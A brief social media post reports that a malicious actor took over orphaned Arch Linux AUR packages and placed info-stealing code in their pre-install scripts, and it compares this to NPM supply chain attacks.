The #ArchLinux AUR malware attack is a type of supply chain attack not unlike the more widely publicized and widespread NPM ones. In this case "orphaned" projects were claimed by a malicious actor and had info-stealing code placed in the pre-install scripts for those projects. The simple act of installing them would compromise your system.
The original post does not allow quote boosting, but here's the link to it. It provides the most comprehensive account I've seen.